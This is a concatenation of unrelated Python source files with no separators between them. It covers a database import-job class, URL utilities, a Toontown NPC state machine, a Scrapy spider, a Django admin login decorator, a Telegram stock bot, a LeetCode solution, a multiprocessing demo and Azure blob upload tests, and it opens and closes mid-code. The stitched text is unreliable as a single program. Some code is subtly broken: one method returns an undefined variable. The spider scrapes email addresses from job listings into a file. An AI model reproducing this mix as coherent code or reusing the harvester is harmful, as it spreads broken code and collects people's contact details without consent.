        self.created = created
        self.updated = updated
        self.deleted = deleted
        return True

    # -------------------------------------------------------------------------
    def __define_tables(self):
        """
            Define the database tables for jobs and items
        """

        self.job_table = self.define_job_table()
        self.item_table = self.define_item_table()

    # -------------------------------------------------------------------------
    @classmethod
    def define_job_table(cls):

        db = current.db
        if cls.JOB_TABLE_NAME not in db:
            job_table = db.define_table(cls.JOB_TABLE_NAME,
                                        Field("job_id", length=128,
                                              unique=True,
                                              notnull=True),
                                        Field("tablename"),
                                        Field("timestmp", "datetime",
                                              default=datetime.utcnow()))
        else:
            job_table = db[cls.JOB_TABLE_NAME]
        return job_table

    # -------------------------------------------------------------------------
    @classmethod
    def define_item_table(cls):

        db = current.db
        if cls.ITEM_TABLE_NAME not in db:
            item_table = db.define_table(cls.ITEM_TABLE_NAME,
                                        Field("item_id", length=128,
                                              unique=True,
                                              notnull=True),
                                        Field("job_id", length=128),
                                        Field("tablename", length=128),
                                        #Field("record_id", "integer"),
                                        Field("record_uid"),
                                        Field("error", "text"),
                                        Field("data", "text"),
                                        Field("element", "text"),
                                        Field("ritems", "list:string"),
                                        Field("citems", "list:string"),
                                        Field("parent", length=128))
        else:
            item_table = db[cls.ITEM_TABLE_NAME]
        return item_table

    # -------------------------------------------------------------------------
    def store(self):
        """
            Store this job and all its items in the job table
        """

        db = current.db

        _debug("Storing Job ID=%s" % self.job_id)
        self.__define_tables()
        jobtable = self.job_table
        query = jobtable.job_id == self.job_id
        row = db(query).select(jobtable.id, limitby=(0, 1)).first()
        if row:
            record_id = row.id
        else:
            record_id = None
        record = Storage(job_id=self.job_id)
        try:
            tablename = self.table._tablename
        except:
            pass
        else:
            record.update(tablename=tablename)
        for item in self.items.values():
            item.store(item_table=self.item_table)
        if record_id:
            db(jobtable.id == record_id).update(**record)
        else:
            record_id = jobtable.insert(**record)
        _debug("Job record ID=%s" % record_id)
        return record_id

    # -------------------------------------------------------------------------
    def get_tree(self):
        """
            Reconstruct the element tree of this job
        """

        if self.tree is not None:
            return tree
        else:
            xml = current.xml
            root = etree.Element(xml.TAG.root)
            for item in self.items.values():
                if item.element is not None and not item.parent:
                    if item.tablename == self.table._tablename or \
                       item.element.get(xml.UID, None) or \
                       item.element.get(xml.ATTRIBUTE.tuid, None):
                        root.append(deepcopy(item.element))
            return etree.ElementTree(root)

    # -------------------------------------------------------------------------
    def delete(self):
        """
            Delete this job and all its items from the job table
        """

        db = current.db

        _debug("Deleting job ID=%s" % self.job_id)
        self.__define_tables()
        item_table = self.item_table
        query = item_table.job_id == self.job_id
        db(query).delete()
        job_table = self.job_table
        query = job_table.job_id == self.job_id
        db(query).delete()

    # -------------------------------------------------------------------------
    def restore_references(self):
        """
            Restore the job's reference structure after loading items
            from the item table
        """

        db = current.db
        UID = current.xml.UID

        for item in self.items.values():
            for citem_id in item.load_components:
                if citem_id in self.items:
                    item.components.append(self.items[citem_id])
            item.load_components = []
            for ritem in item.load_references:
                field = ritem["field"]
                if "item_id" in ritem:
                    item_id = ritem["item_id"]
                    if item_id in self.items:
                        _item = self.items[item_id]
                        entry = Storage(tablename=_item.tablename,
                                        element=_item.element,
                                        uid=_item.uid,
                                        id=_item.id,
                                        item_id=item_id)
                        item.references.append(Storage(field=field,
                                                       entry=entry))
                else:
                    _id = None
                    uid = ritem.get("uid", None)
                    tablename = ritem.get("tablename", None)
                    if tablename and uid:
                        try:
                            table = current.s3db[tablename]
                        except:
                            continue
                        if UID not in table.fields:
                            continue
                        query = table[UID] == uid
                        row = db(query).select(table._id,
                                               limitby=(0, 1)).first()
                        if row:
                            _id = row[table._id.name]
                        else:
                            continue
                        entry = Storage(tablename = ritem["tablename"],
                                        element=None,
                                        uid = ritem["uid"],
                                        id = _id,
                                        item_id = None)
                        item.references.append(Storage(field=field,
                                                       entry=entry))
            item.load_references = []
            if item.load_parent is not None:
                item.parent = self.items[item.load_parent]
                item.load_parent = None

# END =========================================================================

from __future__ import absolute_import, division, print_function, unicode_literals
import string
import urllib
try:
    from urllib.parse import urlparse, urlencode, urljoin, parse_qsl, urlunparse
    from urllib.request import urlopen, Request
    from urllib.error import HTTPError
except ImportError:
    from urlparse import urlparse, urljoin, urlunparse, parse_qsl
    from urllib import urlencode
    from urllib2 import urlopen, Request, HTTPError

from random import SystemRandom

try:
    UNICODE_ASCII_CHARACTERS = (string.ascii_letters +
        string.digits)
except AttributeError:
    UNICODE_ASCII_CHARACTERS = (string.ascii_letters.decode('ascii') +
        string.digits.decode('ascii'))


def random_ascii_string(length):
    random = SystemRandom()
    return ''.join([random.choice(UNICODE_ASCII_CHARACTERS) for x in range(length)])


def url_query_params(url):
    """Return query parameters as a dict from the specified URL.

    :param url: URL.
    :type url: str
    :rtype: dict
    """
    return dict(parse_qsl(urlparse(url).query, True))


def url_dequery(url):
    """Return a URL with the query component removed.

    :param url: URL to dequery.
    :type url: str
    :rtype: str
    """
    url = urlparse(url)
    return urlunparse((url.scheme,
                                url.netloc,
                                url.path,
                                url.params,
                                '',
                                url.fragment))


def build_url(base, additional_params=None):
    """Construct a URL based off of base containing all parameters in
    the query portion of base plus any additional parameters.

    :param base: Base URL
    :type base: str
    ::param additional_params: Additional query parameters to include.
    :type additional_params: dict
    :rtype: str
    """
    url = urlparse(base)
    query_params = {}
    query_params.update(parse_qsl(url.query, True))
    if additional_params is not None:
        query_params.update(additional_params)
        for k, v in additional_params.items():
            if v is None:
                query_params.pop(k)

    return urlunparse((url.scheme,
                                url.netloc,
                                url.path,
                                url.params,
                                urlencode(query_params),
                                url.fragment))

from otp.ai.AIBaseGlobal import *
import DistributedCCharBaseAI
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from direct.task import Task
import random
from toontown.toonbase import ToontownGlobals
from toontown.toonbase import TTLocalizer
import CharStateDatasAI

class DistributedGoofySpeedwayAI(DistributedCCharBaseAI.DistributedCCharBaseAI):
    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedGoofySpeedwayAI')

    def __init__(self, air):
        DistributedCCharBaseAI.DistributedCCharBaseAI.__init__(self, air, TTLocalizer.Goofy)
        self.fsm = ClassicFSM.ClassicFSM('DistributedGoofySpeedwayAI', [State.State('Off', self.enterOff, self.exitOff, ['Lonely', 'TransitionToCostume', 'Walk']),
         State.State('Lonely', self.enterLonely, self.exitLonely, ['Chatty', 'Walk', 'TransitionToCostume']),
         State.State('Chatty', self.enterChatty, self.exitChatty, ['Lonely', 'Walk', 'TransitionToCostume']),
         State.State('Walk', self.enterWalk, self.exitWalk, ['Lonely', 'Chatty', 'TransitionToCostume']),
         State.State('TransitionToCostume', self.enterTransitionToCostume, self.exitTransitionToCostume, ['Off'])], 'Off', 'Off')
        self.fsm.enterInitialState()
        self.handleHolidays()

    def delete(self):
        self.fsm.requestFinalState()
        DistributedCCharBaseAI.DistributedCCharBaseAI.delete(self)
        self.lonelyDoneEvent = None
        self.lonely = None
        self.chattyDoneEvent = None
        self.chatty = None
        self.walkDoneEvent = None
        self.walk = None
        return

    def generate(self):
        DistributedCCharBaseAI.DistributedCCharBaseAI.generate(self)
        name = self.getName()
        self.lonelyDoneEvent = self.taskName(name + '-lonely-done')
        self.lonely = CharStateDatasAI.CharLonelyStateAI(self.lonelyDoneEvent, self)
        self.chattyDoneEvent = self.taskName(name + '-chatty-done')
        self.chatty = CharStateDatasAI.CharChattyStateAI(self.chattyDoneEvent, self)
        self.walkDoneEvent = self.taskName(name + '-walk-done')
        if self.diffPath == None:
            self.walk = CharStateDatasAI.CharWalkStateAI(self.walkDoneEvent, self)
        else:
            self.walk = CharStateDatasAI.CharWalkStateAI(self.walkDoneEvent, self, self.diffPath)
        return

    def walkSpeed(self):
        return ToontownGlobals.GoofySpeed

    def start(self):
        self.fsm.request('Lonely')

    def __decideNextState(self, doneStatus):
        if self.transitionToCostume == 1:
            curWalkNode = self.walk.getDestNode()
            if simbase.air.holidayManager:
                if ToontownGlobals.HALLOWEEN_COSTUMES in simbase.air.holidayManager.currentHolidays and simbase.air.holidayManager.currentHolidays[ToontownGlobals.HALLOWEEN_COSTUMES]:
                    simbase.air.holidayManager.currentHolidays[ToontownGlobals.HALLOWEEN_COSTUMES].triggerSwitch(curWalkNode, self)
                    self.fsm.request('TransitionToCostume')
                elif ToontownGlobals.APRIL_FOOLS_COSTUMES in simbase.air.holidayManager.currentHolidays and simbase.air.holidayManager.currentHolidays[ToontownGlobals.APRIL_FOOLS_COSTUMES]:
                    simbase.air.holidayManager.currentHolidays[ToontownGlobals.APRIL_FOOLS_COSTUMES].triggerSwitch(curWalkNode, self)
                    self.fsm.request('TransitionToCostume')
                else:
                    self.notify.warning('transitionToCostume == 1 but no costume holiday')
            else:
                self.notify.warning('transitionToCostume == 1 but no holiday Manager')
        if doneStatus['state'] == 'lonely' and doneStatus['status'] == 'done':
            self.fsm.request('Walk')
        elif doneStatus['state'] == 'chatty' and doneStatus['status'] == 'done':
            self.fsm.request('Walk')
        elif doneStatus['state'] == 'walk' and doneStatus['status'] == 'done':
            if len(self.nearbyAvatars) > 0:
                self.fsm.request('Chatty')
            else:
                self.fsm.request('Lonely')

    def enterOff(self):
        pass

    def exitOff(self):
        DistributedCCharBaseAI.DistributedCCharBaseAI.exitOff(self)

    def enterLonely(self):
        self.lonely.enter()
        self.acceptOnce(self.lonelyDoneEvent, self.__decideNextState)

    def exitLonely(self):
        self.ignore(self.lonelyDoneEvent)
        self.lonely.exit()

    def __goForAWalk(self, task):
        self.notify.debug('going for a walk')
        self.fsm.request('Walk')
        return Task.done

    def enterChatty(self):
        self.chatty.enter()
        self.acceptOnce(self.chattyDoneEvent, self.__decideNextState)

    def exitChatty(self):
        self.ignore(self.chattyDoneEvent)
        self.chatty.exit()

    def enterWalk(self):
        self.notify.debug('going for a walk')
        self.walk.enter()
        self.acceptOnce(self.walkDoneEvent, self.__decideNextState)

    def exitWalk(self):
        self.ignore(self.walkDoneEvent)
        self.walk.exit()

    def avatarEnterNextState(self):
        if len(self.nearbyAvatars) == 1:
            if self.fsm.getCurrentState().getName() != 'Walk':
                self.fsm.request('Chatty')
            else:
                self.notify.debug('avatarEnterNextState: in walk state')
        else:
            self.notify.debug('avatarEnterNextState: num avatars: ' + str(len(self.nearbyAvatars)))

    def avatarExitNextState(self):
        if len(self.nearbyAvatars) == 0:
            if self.fsm.getCurrentState().getName() != 'Walk':
                self.fsm.request('Lonely')

    def handleHolidays(self):
        DistributedCCharBaseAI.DistributedCCharBaseAI.handleHolidays(self)
        if hasattr(simbase.air, 'holidayManager'):
            if ToontownGlobals.APRIL_FOOLS_COSTUMES in simbase.air.holidayManager.currentHolidays:
                if simbase.air.holidayManager.currentHolidays[ToontownGlobals.APRIL_FOOLS_COSTUMES] != None and simbase.air.holidayManager.currentHolidays[ToontownGlobals.APRIL_FOOLS_COSTUMES].getRunningState():
                    self.diffPath = TTLocalizer.Donald
        return

    def getCCLocation(self):
        if self.diffPath == None:
            return 1
        else:
            return 0
        return

    def enterTransitionToCostume(self):
        pass

    def exitTransitionToCostume(self):
        pass

#!/usr/bin/python
# -*- coding: utf-8 -*-

from scrapy.spider import Spider
from scrapy.selector import Selector

from my_settings import name_file, test_mode, difference_days
from datetime import datetime, timedelta

print "Run spider NewenglandFilm"

file_output = open(name_file, 'a')
email_current_session = []
email_in_file = open(name_file, 'r').readlines()

if test_mode:
    current_date = (datetime.today() - timedelta(days=difference_days)).strftime('%m/%d/%Y')
else:
    current_date = datetime.today().strftime('%m/%d/%Y')

class NewenglandFilm(Spider):
    name = 'newenglandfilm'
    allowed_domains = ["newenglandfilm.com"]
    start_urls = ["http://newenglandfilm.com/jobs.htm"]

    def parse(self, response):
        sel = Selector(response)
        for num_div in xrange(1, 31):
            date = sel.xpath('//*[@id="mainContent"]/div[{0}]/span/text()'.format(str(num_div))).re('(\d{1,2}\/\d{1,2}\/\d{4})')[0]
            email = sel.xpath('//*[@id="mainContent"]/div[{0}]/div/text()'.format(str(num_div))).re('(\w+@[a-zA-Z0-9_]+?\.[a-zA-Z]{2,6})')
            if current_date == date:
                for address in email:
                    if address + "\n" not in email_in_file and address not in email_current_session:
                        file_output.write(address + "\n")
                        email_current_session.append(address)
                        print "Spider: NewenglandFilm. Email {0} added to file".format(address)
                    else:
                        print "Spider: NewenglandFilm. Email {0} already in the file".format(address)
import base64
try:
    from functools import wraps
except ImportError:
    from django.utils.functional import wraps  # Python 2.3, 2.4 fallback.

from django import http, template
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login
from django.shortcuts import render_to_response
from django.utils.translation import ugettext_lazy, ugettext as _

ERROR_MESSAGE = ugettext_lazy("Please enter a correct username and password. Note that both fields are case-sensitive.")
LOGIN_FORM_KEY = 'this_is_the_login_form'

def _display_login_form(request, error_message=''):
    request.session.set_test_cookie()
    return render_to_response('admin/login.html', {
        'title': _('Log in'),
        'app_path': request.get_full_path(),
        'error_message': error_message
    }, context_instance=template.RequestContext(request))

def staff_member_required(view_func):
    """
    Decorator for views that checks that the user is logged in and is a staff
    member, displaying the login page if necessary.
    """
    def _checklogin(request, *args, **kwargs):
        if request.user.is_authenticated() and request.user.is_staff:
            # The user is valid. Continue to the admin page.
            return view_func(request, *args, **kwargs)

        assert hasattr(request, 'session'), "The Django admin requires session middleware to be installed. Edit your MIDDLEWARE_CLASSES setting to insert 'django.contrib.sessions.middleware.SessionMiddleware'."

        # If this isn't already the login page, display it.
        if LOGIN_FORM_KEY not in request.POST:
            if request.POST:
                message = _("Please log in again, because your session has expired.")
            else:
                message = ""
            return _display_login_form(request, message)

        # Check that the user accepts cookies.
        if not request.session.test_cookie_worked():
            message = _("Looks like your browser isn't configured to accept cookies. Please enable cookies, reload this page, and try again.")
            return _display_login_form(request, message)
        else:
            request.session.delete_test_cookie()

        # Check the password.
        username = request.POST.get('username', None)
        password = request.POST.get('password', None)
        user = authenticate(username=username, password=password)
        if user is None:
            message = ERROR_MESSAGE
            if '@' in username:
                # Mistakenly entered e-mail address instead of username? Look it up.
                users = list(User.all().filter('email =', username))
                if len(users) == 1 and users[0].check_password(password):
                    message = _("Your e-mail address is not your username. Try '%s' instead.") % users[0].username
                else:
                    # Either we cannot find the user, or if more than 1
                    # we cannot guess which user is the correct one.
                    message = _("Usernames cannot contain the '@' character.")
            return _display_login_form(request, message)

        # The user data is correct; log in the user in and continue.
        else:
            if user.is_active and user.is_staff:
                login(request, user)
                return http.HttpResponseRedirect(request.get_full_path())
            else:
                return _display_login_form(request, ERROR_MESSAGE)

    return wraps(view_func)(_checklogin)

#guimporter.py
import sys

from PySide import QtGui, QtCore, QtWebKit
Signal = QtCore.Signal
# -*- coding: utf-8 -*-
# @Author: karthik
# @Date:   2016-12-10 21:40:07
# @Last Modified by:   chandan
# @Last Modified time: 2016-12-11 12:55:27

from models.portfolio import Portfolio
from models.company import Company
from models.position import Position

import tenjin
from tenjin.helpers import *
import wikipedia

import matplotlib.pyplot as plt

from data_helpers import *
from stock_data import *

import BeautifulSoup as bs
import urllib2
import re

from datetime import date as dt

engine = tenjin.Engine(path=['templates'])

# info fetch handler
def send_info_handler(bot, update, args):
	args = list(parse_args(args))
	if len(args) == 0 or "portfolio" in [arg.lower() for arg in args] :
		send_portfolio_info(bot, update)
	else:
		info_companies = get_companies(args)
		send_companies_info(bot, update, info_companies)


# get portfolio function
def send_portfolio_info(bot, update):
	print "Userid: %d requested portfolio information" %(update.message.chat_id)
	context = {
	'positions': Portfolio.instance.positions,
    'wallet_value': Portfolio.instance.wallet_value,
	}
	html_str = engine.render('portfolio_info.pyhtml', context)
	bot.sendMessage(parse_mode="HTML", chat_id=update.message.chat_id, text=html_str)

# get companies information
def send_companies_info(bot, update, companies):
	print "Userid: requested information for following companies %s" %','.join([c.name for c in companies])

	for company in companies:
		context = {
		'company': company,
		'current_price': get_current_price(company),
		'description': wikipedia.summary(company.name.split()[0], sentences=2)
		}

		wiki_page = wikipedia.page(company.name.split()[0])
		html_page = urllib2.urlopen(wiki_page.url)
		soup = bs.BeautifulSoup(html_page)
		img_url = 'http:' + soup.find('td', { "class" : "logo" }).find('img')['src']
		bot.sendPhoto(chat_id=update.message.chat_id, photo=img_url)

		html_str = engine.render('company_template.pyhtml', context)
		bot.sendMessage(parse_mode="HTML", chat_id=update.message.chat_id, text=html_str)

	symbols = [c.symbol for c in companies]
	if len(symbols) >= 2:
		symbol_string = ", ".join(symbols[:-1]) + " and " + symbols[-1]
	else:
		symbol_string = symbols[0]

	last_n_days = 10

	if len(companies) < 4:
		create_graph(companies, last_n_days)
		history_text = '''
			Here's the price history for {} for the last {} days
		'''.format(symbol_string, last_n_days)

		bot.sendMessage(chat_id=update.message.chat_id, text=history_text)
		bot.sendPhoto(chat_id=update.message.chat_id, photo=open("plots/temp.png",'rb'))

def create_graph(companies, timedel):

	fig, ax = plt.subplots()
	for company in companies:
		dates, lookback_prices = get_lookback_prices(company, timedel)
		# dates = [i.strftime('%d/%m') for i in dates]
		h = ax.plot(dates, lookback_prices, label=company.symbol)

	ax.legend()
	plt.xticks(rotation=45)
	plt.savefig('plots/temp.png')


#!/usr/bin/python
from typing import List, Optional


"""
16. 3Sum Closest

https://leetcode.com/problems/3sum-closest/
"""


def bsearch(nums, left, right, res, i, j, target):
    while left <= right:
        middle = (left + right) // 2
        candidate = nums[i] + nums[j] + nums[middle]
        if res is None or abs(candidate - target) < abs(res - target):
            res = candidate
        if candidate == target:
            return res
        elif candidate > target:
            right = middle - 1
        else:
            left = middle + 1
    return res


class Solution:
    def threeSumClosest(self, nums: List[int], target: int) -> Optional[int]:
        res = None
        nums = sorted(nums)

        for i in range(len(nums)):
            for j in range(i + 1, len(nums)):
                res = bsearch(nums, j + 1, len(nums) - 1, res, i, j, target)
        return res


def main():
    sol = Solution()
    print(sol.threeSumClosest([-111, -111, 3, 6, 7, 16, 17, 18, 19], 13))
    return 0


if __name__ == '__main__':
    raise SystemExit(main())

from multiprocessing import Pool

import os, time, random


def long_time_task(name):
    print 'Run task %s (%s)...' % (name, os.getpid())
    start = time.time()
    time.sleep(random.random() * 3)
    end = time.time()
    print 'Task %s runs %0.2f seconds.' % (name, (end - start))


if __name__ == '__main__':
    print 'Parent process %s.' % os.getpid()
    p = Pool()

    for i in range(5):
        p.apply_async(long_time_task, args=(i,))
    print 'Waiting for all subprocesses done...'
    p.close()
    p.join()
    print 'All subprocesses done.'
    """
    代码解读：

    对Pool对象调用join()方法会等待所有子进程执行完毕，调用join()之前必须先调用close()，调用close()之后就不能继续添加新的Process了。

    请注意输出的结果，task 0，1，2，3是立刻执行的，而task 4要等待前面某个task完成后才执行，这是因为Pool的默认大小在我的电脑上是4，因此，最多同时执行4个进程。这是Pool有意设计的限制，并不是操作系统的限制。如果改成：

    p = Pool(5)
    """
# coding: utf-8

# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------

import pytest

from os import path, remove, sys, urandom
import platform
import uuid
from azure.storage.blob import (
    BlobServiceClient,
    ContainerClient,
    BlobClient,
    ContentSettings
)

if sys.version_info >= (3,):
    from io import BytesIO
else:
    from cStringIO import StringIO as BytesIO

from settings.testcase import BlobPreparer
from devtools_testutils.storage import StorageTestCase

# ------------------------------------------------------------------------------
TEST_BLOB_PREFIX = 'largeblob'
LARGE_BLOB_SIZE = 12 * 1024 * 1024
LARGE_BLOCK_SIZE = 6 * 1024 * 1024

# ------------------------------------------------------------------------------
if platform.python_implementation() == 'PyPy':
    pytest.skip("Skip tests for Pypy", allow_module_level=True)

class StorageLargeBlockBlobTest(StorageTestCase):
    def _setup(self, storage_account_name, key):
        # test chunking functionality by reducing the threshold
        # for chunking and the size of each chunk, otherwise
        # the tests would take too long to execute
        self.bsc = BlobServiceClient(
            self.account_url(storage_account_name, "blob"),
            credential=key,
            max_single_put_size=32 * 1024,
            max_block_size=2 * 1024 * 1024,
            min_large_block_upload_threshold=1 * 1024 * 1024)
        self.config = self.bsc._config
        self.container_name = self.get_resource_name('utcontainer')

        if self.is_live:
            try:
                self.bsc.create_container(self.container_name)
            except:
                pass

    def _teardown(self, file_name):
        if path.isfile(file_name):
            try:
                remove(file_name)
            except:
                pass

    # --Helpers-----------------------------------------------------------------
    def _get_blob_reference(self):
        return self.get_resource_name(TEST_BLOB_PREFIX)

    def _create_blob(self):
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        blob.upload_blob(b'')
        return blob

    def assertBlobEqual(self, container_name, blob_name, expected_data):
        blob = self.bsc.get_blob_client(container_name, blob_name)
        actual_data = blob.download_blob()
        self.assertEqual(b"".join(list(actual_data.chunks())), expected_data)

    # --Test cases for block blobs --------------------------------------------
    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_put_block_bytes_large(self, storage_account_name, storage_account_key):
        self._setup(storage_account_name, storage_account_key)
        blob = self._create_blob()

        # Act
        for i in range(5):
            resp = blob.stage_block(
                'block {0}'.format(i).encode('utf-8'), urandom(LARGE_BLOCK_SIZE))
            self.assertIsNotNone(resp)
            assert 'content_md5' in resp
            assert 'content_crc64' in resp
            assert 'request_id' in resp

            # Assert

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_put_block_bytes_large_with_md5(self, storage_account_name, storage_account_key):
        self._setup(storage_account_name, storage_account_key)
        blob = self._create_blob()

        # Act
        for i in range(5):
            resp = blob.stage_block(
                'block {0}'.format(i).encode('utf-8'),
                urandom(LARGE_BLOCK_SIZE),
                validate_content=True)
            self.assertIsNotNone(resp)
            assert 'content_md5' in resp
            assert 'content_crc64' in resp
            assert 'request_id' in resp

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_put_block_stream_large(self, storage_account_name, storage_account_key):
        self._setup(storage_account_name, storage_account_key)
        blob = self._create_blob()

        # Act
        for i in range(5):
            stream = BytesIO(bytearray(LARGE_BLOCK_SIZE))
            resp = resp = blob.stage_block(
                'block {0}'.format(i).encode('utf-8'),
                stream,
                length=LARGE_BLOCK_SIZE)
            self.assertIsNotNone(resp)
            assert 'content_md5' in resp
            assert 'content_crc64' in resp
            assert 'request_id' in resp

            # Assert

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_put_block_stream_large_with_md5(self, storage_account_name, storage_account_key):
        self._setup(storage_account_name, storage_account_key)
        blob = self._create_blob()

        # Act
        for i in range(5):
            stream = BytesIO(bytearray(LARGE_BLOCK_SIZE))
            resp = resp = blob.stage_block(
                'block {0}'.format(i).encode('utf-8'),
                stream,
                length=LARGE_BLOCK_SIZE,
                validate_content=True)
            self.assertIsNotNone(resp)
            assert 'content_md5' in resp
            assert 'content_crc64' in resp
            assert 'request_id' in resp

        # Assert

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_path(self, storage_account_name, storage_account_key):
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'large_blob_from_path.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, max_concurrency=2, overwrite=True)

        block_list = blob.get_block_list()

        # Assert
        self.assertIsNot(len(block_list), 0)
        self.assertBlobEqual(self.container_name, blob_name, data)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_path_with_md5(self, storage_account_name, storage_account_key):
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = "blob_from_path_with_md5.temp.dat"
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, validate_content=True, max_concurrency=2)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_path_non_parallel(self, storage_account_name, storage_account_key):
        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(self.get_random_bytes(100))
        FILE_PATH = "blob_from_path_non_parallel.temp.dat"
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, max_concurrency=1)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_path_with_progress(self, storage_account_name, storage_account_key):
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = "blob_from_path_with_progress.temp.dat"
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        progress = []
        def callback(response):
            current = response.context['upload_stream_current']
            total = response.context['data_stream_total']
            if current is not None:
                progress.append((current, total))

        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, max_concurrency=2, raw_response_hook=callback)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self.assert_upload_progress(len(data), self.config.max_block_size, progress)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_path_with_properties(self, storage_account_name, storage_account_key):
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'blob_from_path_with_properties.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        content_settings = ContentSettings(
            content_type='image/png',
            content_language='spanish')
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, content_settings=content_settings, max_concurrency=2)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        properties = blob.get_blob_properties()
        self.assertEqual(properties.content_settings.content_type, content_settings.content_type)
        self.assertEqual(properties.content_settings.content_language, content_settings.content_language)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_stream_chunked_upload(self, storage_account_name, storage_account_key):
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'blob_from_stream_chunked_upload.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, max_concurrency=2)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_creat_lrgblob_frm_stream_w_progress_chnkd_upload(self, storage_account_name, storage_account_key):
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'stream_w_progress_chnkd_upload.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        progress = []
        def callback(response):
            current = response.context['upload_stream_current']
            total = response.context['data_stream_total']
            if current is not None:
                progress.append((current, total))

        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, max_concurrency=2, raw_response_hook=callback)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data)
        self.assert_upload_progress(len(data), self.config.max_block_size, progress)
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_create_large_blob_from_stream_chunked_upload_with_count(self, storage_account_name, storage_account_key):
        # parallel tests introduce random order of requests, can only run live
        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'chunked_upload_with_count.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        blob_size = len(data) - 301
        with open(FILE_PATH, 'rb') as stream:
            blob.upload_blob(stream, length=blob_size, max_concurrency=2)

        # Assert
        self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
        self._teardown(FILE_PATH)

    @pytest.mark.live_test_only
    @BlobPreparer()
    def test_creat_lrgblob_frm_strm_chnkd_uplod_w_count_n_props(self, storage_account_name, storage_account_key):
        # parallel tests introduce random order of requests, can only run live

        self._setup(storage_account_name, storage_account_key)
        blob_name = self._get_blob_reference()
        blob = self.bsc.get_blob_client(self.container_name, blob_name)
        data = bytearray(urandom(LARGE_BLOB_SIZE))
        FILE_PATH = 'plod_w_count_n_props.temp.{}.dat'.format(str(uuid.uuid4()))
        with open(FILE_PATH, 'wb') as stream:
            stream.write(data)

        # Act
        content_settings = ContentSettings(
            content_type='image/png',
            content_language='spanish')
        blob_size = len(data) - 301
